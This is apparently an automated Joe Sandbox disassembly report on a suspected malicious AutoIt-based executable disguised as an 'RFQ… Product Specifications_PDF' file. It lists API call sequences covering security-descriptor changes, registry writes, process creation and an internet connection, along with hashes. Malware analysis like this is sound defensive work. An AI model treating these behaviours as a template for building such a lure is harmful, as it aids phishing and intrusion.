                                                                                                                  • Part of subcall function 00AA10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1120
                                                                                                                  • Part of subcall function 00AA10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA112F
                                                                                                                  • Part of subcall function 00AA10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00AA0B9B,?,?,?), ref: 00AA1136
                                                                                                                  • Part of subcall function 00AA10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AA114D
                                                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AA0DF5
                                                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AA0E29
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0E40
                                                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 00AA0E7A
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AA0E96
                                                                                                                • GetLengthSid.ADVAPI32(?), ref: 00AA0EAD
                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00AA0EB5
                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00AA0EBC
                                                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AA0EDD
                                                                                                                • CopySid.ADVAPI32(00000000), ref: 00AA0EE4
                                                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AA0F13
                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AA0F35
                                                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AA0F47
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F6E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F75
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F7E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F85
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00AA0F8E
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0F95
                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00AA0FA1
                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00AA0FA8
                                                                                                                  • Part of subcall function 00AA1193: GetProcessHeap.KERNEL32(00000008,00AA0BB1,?,00000000,?,00AA0BB1,?), ref: 00AA11A1
                                                                                                                  • Part of subcall function 00AA1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00AA0BB1,?), ref: 00AA11A8
                                                                                                                  • Part of subcall function 00AA1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00AA0BB1,?), ref: 00AA11B7
                                                                                                                Similarity
                                                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 4175595110-0
                                                                                                                • Opcode ID: f6a4f29b934746d8439d51750bbee147db522ddebf12a02767e540bcae25ef2f
                                                                                                                • Instruction ID: 9302367438467b2fc13c577fb7804e3edf200d333eacfd3533b59425be6ed7db
                                                                                                                • Opcode Fuzzy Hash: f6a4f29b934746d8439d51750bbee147db522ddebf12a02767e540bcae25ef2f
                                                                                                                • Instruction Fuzzy Hash: 45713A7290121AEFDF20DFA4DD44FAEBBB8AF05311F14421AF919E7191D771A905CB60
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00ACC4BD
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,00ADCC08,00000000,?,00000000,?,?), ref: 00ACC544
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00ACC5A4
                                                                                                                • _wcslen.LIBCMT ref: 00ACC5F4
                                                                                                                • _wcslen.LIBCMT ref: 00ACC66F
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00ACC6B2
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00ACC7C1
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00ACC84D
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 00ACC881
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00ACC88E
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00ACC960
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 9721498-966354055
                                                                                                                • Opcode ID: e2ce5b01f5dc62cdffd3359c81b4442619c695835a67c7a0c03faef6de186ee2
                                                                                                                • Instruction ID: 40223497726f8df3c110ee14b48843ba993623c72c63c410154fa04c4cde9503
                                                                                                                • Opcode Fuzzy Hash: e2ce5b01f5dc62cdffd3359c81b4442619c695835a67c7a0c03faef6de186ee2
                                                                                                                • Instruction Fuzzy Hash: FF1247356042119FDB14DF14C991F2AB7E5EF88724F05889DF89A9B3A2DB31ED41CB82
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 00AD09C6
                                                                                                                • _wcslen.LIBCMT ref: 00AD0A01
                                                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00AD0A54
                                                                                                                • _wcslen.LIBCMT ref: 00AD0A8A
                                                                                                                • _wcslen.LIBCMT ref: 00AD0B06
                                                                                                                • _wcslen.LIBCMT ref: 00AD0B81
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                  • Part of subcall function 00AA2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00AA2BFA
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                • API String ID: 1103490817-4258414348
                                                                                                                • Opcode ID: bbb7f2ee2bbb8ca018dfe7e26075ca13c29d0095bda3c09a564fa87979d6b7dd
                                                                                                                • Instruction ID: 49c443f658882ae13cfa77af2fc4cbd223da3740d9528bdaed55ee338221949e
                                                                                                                • Opcode Fuzzy Hash: bbb7f2ee2bbb8ca018dfe7e26075ca13c29d0095bda3c09a564fa87979d6b7dd
                                                                                                                • Instruction Fuzzy Hash: C5E18C366087019FC714DF24C550A2ABBE2FF98354F14895EF8969B3A2DB31ED45CB82
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                • API String ID: 1256254125-909552448
                                                                                                                • Opcode ID: 65a1567faac5e124328d0a7df98902f0b50076f8d5624ba16e78794b366c728c
                                                                                                                • Instruction ID: a144a1daae67312cd8d800e2657405fe73cc9995bec4792d98c61ed4ff015d22
                                                                                                                • Opcode Fuzzy Hash: 65a1567faac5e124328d0a7df98902f0b50076f8d5624ba16e78794b366c728c
                                                                                                                • Instruction Fuzzy Hash: 0A71C733A4452A8BCB10DF7C8951FBA77A2AB647B4B16052CF86E97284EA31DD45C390
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00AD835A
                                                                                                                • _wcslen.LIBCMT ref: 00AD836E
                                                                                                                • _wcslen.LIBCMT ref: 00AD8391
                                                                                                                • _wcslen.LIBCMT ref: 00AD83B4
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00AD83F2
                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00AD5BF2), ref: 00AD844E
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AD8487
                                                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00AD84CA
                                                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00AD8501
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 00AD850D
                                                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00AD851D
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?,00AD5BF2), ref: 00AD852C
                                                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00AD8549
                                                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00AD8555
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                • String ID: .dll$.exe$.icl
                                                                                                                • API String ID: 799131459-1154884017
                                                                                                                • Opcode ID: 4450c388ee4490b6eeec1688b8fc02b18636091f5ff77813aeda4ef5f95c4de7
                                                                                                                • Instruction ID: 534a121190448c4701dea509527d6a904460ec09333913dc5f366cfba4d14c7c
                                                                                                                • Opcode Fuzzy Hash: 4450c388ee4490b6eeec1688b8fc02b18636091f5ff77813aeda4ef5f95c4de7
                                                                                                                • Instruction Fuzzy Hash: F461C171940215BAEB14DF64DC41BBF77B8BB08B21F10460AF916DA1D1DF78AA81C7A0
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                • API String ID: 0-1645009161
                                                                                                                • Opcode ID: fd486f005fd7be2a073d20b15708e07ceb7b90442a20294ffe084fffbb614386
                                                                                                                • Instruction ID: eb23726198533b79a1a28bb8646ed5fd5fad70ca7b52871c61a99f664f6dc2ef
                                                                                                                • Opcode Fuzzy Hash: fd486f005fd7be2a073d20b15708e07ceb7b90442a20294ffe084fffbb614386
                                                                                                                • Instruction Fuzzy Hash: A381EF75A00205BEDB20BF60CD42FAF7BB8BF95300F004425FC05AA292EBB5DA55C7A1
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 00AA5A2E
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00AA5A40
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00AA5A57
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 00AA5A6C
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00AA5A72
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00AA5A82
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 00AA5A88
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AA5AA9
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AA5AC3
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00AA5ACC
                                                                                                                • _wcslen.LIBCMT ref: 00AA5B33
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00AA5B6F
                                                                                                                • GetDesktopWindow.USER32 ref: 00AA5B75
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AA5B7C
                                                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00AA5BD3
                                                                                                                • GetClientRect.USER32(?,?), ref: 00AA5BE0
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 00AA5C05
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AA5C2F
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 895679908-0
                                                                                                                • Opcode ID: f160227c48a23945c1e3dd69357ed52469a9955edb366cd734a1ab07ca24dbad
                                                                                                                • Instruction ID: 3093052bf0b115c4120b85611bab962a3b1fc21497d619f5cdc7eee911be5458
                                                                                                                • Opcode Fuzzy Hash: f160227c48a23945c1e3dd69357ed52469a9955edb366cd734a1ab07ca24dbad
                                                                                                                • Instruction Fuzzy Hash: 58717E31A00B0AAFDB20DFB8CE85AAEBBF5FF48715F104519E142A35A0D775E944CB64
                                                                                                                APIs
                                                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00A600C6
                                                                                                                  • Part of subcall function 00A600ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00B1070C,00000FA0,C7DB6268,?,?,?,?,00A823B3,000000FF), ref: 00A6011C
                                                                                                                  • Part of subcall function 00A600ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A823B3,000000FF), ref: 00A60127
                                                                                                                  • Part of subcall function 00A600ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A823B3,000000FF), ref: 00A60138
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 00A6014E
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00A6015C
                                                                                                                  • Part of subcall function 00A600ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00A6016A
                                                                                                                  • Part of subcall function 00A600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A60195
                                                                                                                  • Part of subcall function 00A600ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A601A0
                                                                                                                • ___scrt_fastfail.LIBCMT ref: 00A600E7
                                                                                                                  • Part of subcall function 00A600A3: __onexit.LIBCMT ref: 00A600A9
                                                                                                                Strings
                                                                                                                • WakeAllConditionVariable, xrefs: 00A60162
                                                                                                                • kernel32.dll, xrefs: 00A60133
                                                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00A60122
                                                                                                                • SleepConditionVariableCS, xrefs: 00A60154
                                                                                                                • InitializeConditionVariable, xrefs: 00A60148
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                • API String ID: 66158676-1714406822
                                                                                                                • Opcode ID: b6719f825b8a816f2857bd7ac270e9d5dfcc67326bdeb6a53601ed58b6148f74
                                                                                                                • Instruction ID: 5bd137737487d6280ed194a76c8fec184a328cd943dd7efbe0a93471de02b653
                                                                                                                • Opcode Fuzzy Hash: b6719f825b8a816f2857bd7ac270e9d5dfcc67326bdeb6a53601ed58b6148f74
                                                                                                                • Instruction Fuzzy Hash: 4421D7326457126FE710ABA4AC0AF6B33B5EB06B61F504626FC03D72D1DFB49C808A90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                                • API String ID: 176396367-1603158881
                                                                                                                • Opcode ID: 2581ac03e9fe4791700c0894abb8e18706b95bf7d0b915427307ed50f6326df8
                                                                                                                • Instruction ID: cd322e88b6dc67b716ddb569e5de201bb32c848101cf28a4ba044bb9e33a17bc
                                                                                                                • Opcode Fuzzy Hash: 2581ac03e9fe4791700c0894abb8e18706b95bf7d0b915427307ed50f6326df8
                                                                                                                • Instruction Fuzzy Hash: 4EE1B333A00616AFCF249FB8C4516EEFBB4BF56710F548159F456A7280DB30AE899B90
                                                                                                                APIs
                                                                                                                • CharLowerBuffW.USER32(00000000,00000000,00ADCC08), ref: 00AB4527
                                                                                                                • _wcslen.LIBCMT ref: 00AB453B
                                                                                                                • _wcslen.LIBCMT ref: 00AB4599
                                                                                                                • _wcslen.LIBCMT ref: 00AB45F4
                                                                                                                • _wcslen.LIBCMT ref: 00AB463F
                                                                                                                • _wcslen.LIBCMT ref: 00AB46A7
                                                                                                                  • Part of subcall function 00A5F9F2: _wcslen.LIBCMT ref: 00A5F9FD
                                                                                                                • GetDriveTypeW.KERNEL32(?,00B06BF0,00000061), ref: 00AB4743
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                • API String ID: 2055661098-1000479233
                                                                                                                • Opcode ID: dbe471935ea1e64f60605f57ed204dd4b62be4c18ad91e6e3305aa2d20837bc3
                                                                                                                • Instruction ID: f9c6c16229a244ee95435ded4e832656f4df131ff147011300ddda5f8cbee8ec
                                                                                                                • Opcode Fuzzy Hash: dbe471935ea1e64f60605f57ed204dd4b62be4c18ad91e6e3305aa2d20837bc3
                                                                                                                • Instruction Fuzzy Hash: B5B1C2756083029FC710DF28C991AAAB7E9BFA9760F504A1DF496C7293DB30DC85CB52
                                                                                                                APIs
                                                                                                                • _wcslen.LIBCMT ref: 00ACB198
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB1B0
                                                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB1D4
                                                                                                                • _wcslen.LIBCMT ref: 00ACB200
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB214
                                                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ACB236
                                                                                                                • _wcslen.LIBCMT ref: 00ACB332
                                                                                                                  • Part of subcall function 00AB05A7: GetStdHandle.KERNEL32(000000F6), ref: 00AB05C6
                                                                                                                • _wcslen.LIBCMT ref: 00ACB34B
                                                                                                                • _wcslen.LIBCMT ref: 00ACB366
                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ACB3B6
                                                                                                                • GetLastError.KERNEL32(00000000), ref: 00ACB407
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACB439
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB44A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB45C
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00ACB46E
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00ACB4E3
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178637699-0
                                                                                                                • Opcode ID: cce1b3ae8657712a33e0d402a4b7a50bcef0751e59483da7eb94b85484becee7
                                                                                                                • Instruction ID: a1b3a5d80b246478d1e198c42e15e24bcfcc2a6817db425082859f1d3318c8a1
                                                                                                                • Opcode Fuzzy Hash: cce1b3ae8657712a33e0d402a4b7a50bcef0751e59483da7eb94b85484becee7
                                                                                                                • Instruction Fuzzy Hash: EDF18E315183409FC714EF24C992F6EBBE5AF85310F15895DF89A5B2A2DB31EC44CB62
                                                                                                                APIs
                                                                                                                • GetMenuItemCount.USER32(00B11990), ref: 00A82F8D
                                                                                                                • GetMenuItemCount.USER32(00B11990), ref: 00A8303D
                                                                                                                • GetCursorPos.USER32(?), ref: 00A83081
                                                                                                                • SetForegroundWindow.USER32(00000000), ref: 00A8308A
                                                                                                                • TrackPopupMenuEx.USER32(00B11990,00000000,?,00000000,00000000,00000000), ref: 00A8309D
                                                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A830A9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 36266755-4108050209
                                                                                                                • Opcode ID: e84c7b233728ed12f44ce463c249ed0b4de252c0508019001ceddc5d0e5da76e
                                                                                                                • Instruction ID: 9f61d8f2e127a25bef05e886ffa0792583b62c2242b039660fef3718e5de2b4f
                                                                                                                • Opcode Fuzzy Hash: e84c7b233728ed12f44ce463c249ed0b4de252c0508019001ceddc5d0e5da76e
                                                                                                                • Instruction Fuzzy Hash: CE713831640206BEEF219F64DD49FAABF74FF45724F204206F6256A1E1C7B1AD20DB50
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?), ref: 00AD6DEB
                                                                                                                  • Part of subcall function 00A46B57: _wcslen.LIBCMT ref: 00A46B6A
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00AD6E5F
                                                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00AD6E81
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD6E94
                                                                                                                • DestroyWindow.USER32(?), ref: 00AD6EB5
                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A40000,00000000), ref: 00AD6EE4
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AD6EFD
                                                                                                                • GetDesktopWindow.USER32 ref: 00AD6F16
                                                                                                                • GetWindowRect.USER32(00000000), ref: 00AD6F1D
                                                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AD6F35
                                                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00AD6F4D
                                                                                                                  • Part of subcall function 00A59944: GetWindowLongW.USER32(?,000000EB), ref: 00A59952
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                • String ID: 0$tooltips_class32
                                                                                                                • API String ID: 2429346358-3619404913
                                                                                                                • Opcode ID: 4b75407f68163e675ce701bec0a4b54eda33bee7ed75a731d97e152605674bdb
                                                                                                                • Instruction ID: 13a9208e960c779c1c8d110184e31b9bc01bf8a8651d3e87794e7b8dc6c746d5
                                                                                                                • Opcode Fuzzy Hash: 4b75407f68163e675ce701bec0a4b54eda33bee7ed75a731d97e152605674bdb
                                                                                                                • Instruction Fuzzy Hash: 7F716674144241AFDB21CF18DC48BAABBF9FB89314F44491EF99A87361DB74E906CB12
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00A59BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00A59BB2
                                                                                                                • DragQueryPoint.SHELL32(?,?), ref: 00AD9147
                                                                                                                  • Part of subcall function 00AD7674: ClientToScreen.USER32(?,?), ref: 00AD769A
                                                                                                                  • Part of subcall function 00AD7674: GetWindowRect.USER32(?,?), ref: 00AD7710
                                                                                                                  • Part of subcall function 00AD7674: PtInRect.USER32(?,?,00AD8B89), ref: 00AD7720
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD91B0
                                                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00AD91BB
                                                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00AD91DE
                                                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00AD9225
                                                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 00AD923E
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AD9255
                                                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 00AD9277
                                                                                                                • DragFinish.SHELL32(?), ref: 00AD927E
                                                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00AD9371
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2341221996.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2341194596.0000000000A40000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000ADC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341312151.0000000000B02000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341365589.0000000000B0C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B14000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                • Associated: 00000000.00000002.2341387945.0000000000B54000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_a40000_RFQ PC25-1301 Product Specifications_PDF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                • API String ID: 221274066-3440237614
                                                                                                                • Opcode ID: a3786bd346969c116c7f2bb019c981bdf9c4db64a2fedd4e58ffe16ae2747dd2
                                                                                                                • Instruction ID: 9198bba885514c3dc24d068acebbf38d936038921f57b043721b5c4c28f23c8f
                                                                                                                • Opcode Fuzzy Hash: a3786bd346969c116c7f2bb019c981bdf9c4db64a2fedd4e58ffe16ae2747dd2
                                                                                                                • Instruction Fuzzy Hash: A1615871108301AFC701DFA4DD85DAFBBF8EFC8760F404A1EB596922A1DB709A49CB52
                                                                                                                APIs
                                                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00ABC4B0
